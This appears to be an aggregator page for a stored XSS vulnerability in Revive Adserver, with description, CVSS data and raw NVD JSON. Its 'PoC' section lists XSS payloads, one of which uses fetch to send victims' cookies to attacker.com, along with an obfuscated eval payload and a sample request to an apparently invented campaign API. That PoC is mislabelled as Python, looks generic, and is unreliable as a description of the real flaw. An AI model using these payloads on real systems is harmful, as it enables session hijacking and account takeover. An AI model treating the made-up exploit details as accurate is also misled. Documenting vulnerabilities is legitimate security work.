CVE-2025-55126

Description

HackerOne community member Dang Hung Vi (vidang04) has reported a stored XSS vulnerability involving the navigation box at the top of advertiser-related pages, with campaign names being the vector for the stored XSS

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:aquaplatform:revive_adserver:*:*:*:*:*:*:*:* - VULNERABLE

广告平台系统受影响版本（具体版本需根据实际产品确定）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-55126 Stored XSS PoC
// Target: Advertiser page navigation box
// Vector: Campaign name field

// Step 1: Create or modify a campaign with malicious payload in name field
// Payload examples:
const payloads = [
    '<script>alert(document.cookie)</script>',
    '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>',
    '<svg onload=eval(atob("YWxlcnQoJ1hTUycpOw=="))>',
    '" onfocus="alert(1)" autofocus x="',
    '<iframe src="javascript:alert(document.domain)">' 
];

// Step 2: When victim visits the advertiser page, the stored script executes
// The navigation box displays the campaign name without proper sanitization

// Example HTTP request to create campaign:
/*
POST /api/campaigns/create HTTP/1.1
Host: target.com
Content-Type: application/json

{
    "name": "<script>alert(document.cookie)</script>",
    "description": "Campaign description",
    "budget": 1000
}
*/

// The malicious script will execute for all users viewing the page

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-55126
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-55126
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-55126/
[4] VulDB https://vuldb.com/cve/CVE-2025-55126
[5] https://hackerone.com/reports/3411750

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-55126", "sourceIdentifier": "[email protected]", "published": "2025-11-20T19:16:18.880", "lastModified": "2026-01-14T21:16:56.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HackerOne community member Dang Hung Vi (vidang04) has reported a stored XSS vulnerability involving the navigation box at the top of advertiser-related pages, with campaign names being the vector for the stored XSS"}, {"lang": "es", "value": "El miembro de la comunidad de HackerOne, Dang Hung Vi (vidang04), ha reportado una vulnerabilidad de XSS almacenado que involucra el cuadro de navegación en la parte superior de las páginas relacionadas con anunciantes, siendo los nombres de las campañas el vector para el XSS almacenado."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aquaplatform:revive_adserver:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "0CF3AE99-F6AB-419A-BB38-D1CDE5B195D2"}]}]}], "references": [{"url": "https://hackerone.com/reports/3411750", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}